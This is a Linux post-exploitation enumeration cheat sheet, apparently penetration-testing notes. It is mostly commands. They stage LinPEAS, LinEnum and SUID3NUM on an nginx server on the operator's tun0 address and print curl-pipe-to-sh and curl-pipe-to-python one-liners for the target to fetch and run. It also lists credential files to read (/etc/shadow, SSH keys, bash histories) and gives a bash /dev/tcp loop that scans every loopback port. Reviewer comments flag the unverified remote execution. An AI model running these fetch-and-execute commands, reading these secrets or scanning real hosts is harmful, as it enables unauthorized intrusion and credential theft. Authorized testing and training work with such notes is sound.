Enum
You don't have time?
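# Stage the enumeration scripts under the nginx web root and print the
# one-liners that fetch them from this host.
# NOTE: the downloads track "latest" / the master branch, so their content can
# change between runs and nothing here checks integrity; read the files (or
# compare them with a checksum recorded from a trusted copy) before serving.
# NOTE: nginx serves this directory over plain HTTP to anything that can reach
# the host; stop the service and remove the directory when finished.

# Serve files with nginx
# -p: a pre-existing directory must not make mkdir fail and skip the nginx start
sudo mkdir -p /var/www/html/enum/ && sudo service nginx start
# Download scripts
# -f: do not save an HTTP error page as if it were the script
# -L: follow redirects (the releases/latest/download URL answers with one)
# -sS: no progress meter, but still print errors
sudo curl -fsSL https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /var/www/html/enum/linpeas.sh
sudo curl -fsSL https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /var/www/html/enum/LinEnum.sh
sudo curl -fsSL https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py -o /var/www/html/enum/suid3num.py
# Print URLs
I="tun0"
# First IPv4 address configured on the interface named in $I
IP=$(ip -f inet addr show "$I" | sed -En -e 's/.*inet ([0-9.]+).*/\1/p')
if [ -z "$IP" ]; then
  # Without an address the printed URLs would be unusable ("http:///enum/...")
  printf 'no IPv4 address found on %s\n' "$I" >&2
else
  for i in /var/www/html/enum/*.sh; do
    [ -e "$i" ] || continue   # glob matched nothing
    printf '\ncurl "http://%s/enum/%s"|sh\n' "$IP" "$(basename -- "$i")"
  done
  for i in /var/www/html/enum/*.py; do
    [ -e "$i" ] || continue   # glob matched nothing
    printf '\ncurl "http://%s/enum/%s"|python\n' "$IP" "$(basename -- "$i")"
  done
fi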
#
All in 1 Scripts
LinPEAS
# Fetches linpeas.sh from the tip of the master branch and pipes it straight
# into sh. The content is neither pinned to a commit nor checksum-verified, so
# whatever the URL serves at fetch time is executed; without curl -f an HTTP
# error body is fed to sh as well.
# NOTE(review): this URL uses a different repository name than the PEASS-ng
# release URL used in the nginx staging snippet on this page - confirm it
# still resolves.
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
LinEnum
# Fetches LinEnum.sh from the tip of the master branch and pipes it straight
# into sh. The content is neither pinned to a commit nor checksum-verified, so
# whatever the URL serves at fetch time is executed; without curl -f an HTTP
# error body is fed to sh as well.
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
SUID Enum
Enumerate SUID programs using only Python 2/3 built-in modules
# Fetches suid3num.py from the tip of the master branch and pipes it into
# whatever interpreter "python" resolves to on this host. The content is
# neither pinned to a commit nor checksum-verified, so whatever the URL serves
# at fetch time is executed; without curl -f an HTTP error body is fed to the
# interpreter as well.
# NOTE(review): hosts that only ship python3 may have no "python" command - confirm.
curl https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py | python
Watch Process
Watch for existing and new processes
Interesting Files
Public
#
/etc/issue
/etc/passwd
/etc/group
Root
#
/etc/sudoers
/etc/shadow
/etc/master.passwd # OpenBSD
/var/spool/cron/crontabs/*
/var/spool/cron/*
User
#
/home/*/.bash_history
/home/*/.ssh/*
Auditd (adm)
When parsing audit logs you may encounter hex-encoded data:
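# Decode hex-encoded cmd= / data= values found in the audit logs and print one
# decoded value per line.
for VAR in cmd data; do
  # grep -h drops the "file:" prefix added when the glob matches several logs.
  # The pattern keeps only values that do not start with a double quote.
  # sed -n ... p prints the value only when it is a run of hex digits, and the
  # input is read line by line, so unrelated fields are never passed to xxd.
  grep -h -- "$VAR=[^\"]" /var/log/audit/audit.log* |
    sed -n "s#.*$VAR=\([0-9A-Fa-f]\{2,\}\).*#\1#p" |
    while IFS= read -r HEX; do
      # The decoded bytes are whatever was logged and may include terminal
      # control sequences: keep printable characters only, then fold
      # tabs/newlines into single spaces so each value stays on one line.
      # (No unquoted $(...) here, so a decoded "*" is not glob-expanded.)
      printf '%s' "$HEX" | xxd -r -p | tr -dc '[:print:]\t\n' | tr -s '\t\n ' '   '
      printf '\n'
    done
done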
Scan Ports
Retrieve hidden listening ports without a scanner or netstat
# Attempts a TCP connection to every port 1-65535 on 127.0.0.1 through bash's
# /dev/tcp redirection and prints "OK <port>" for each port that accepts.
# Connection errors are discarded by the trailing 2>/dev/null.
# /dev/tcp is implemented by bash itself, hence the explicit "bash -c".
# Only listeners reachable via loopback are reported; a service bound solely
# to another interface address is not found this way.
# Detection note: this appears as a single bash process making up to 65535
# loopback connection attempts in sequence.
bash -c 'for i in {1..65535};do echo>/dev/tcp/127.0.0.1/$i&&echo OK $i;done' 2>/dev/null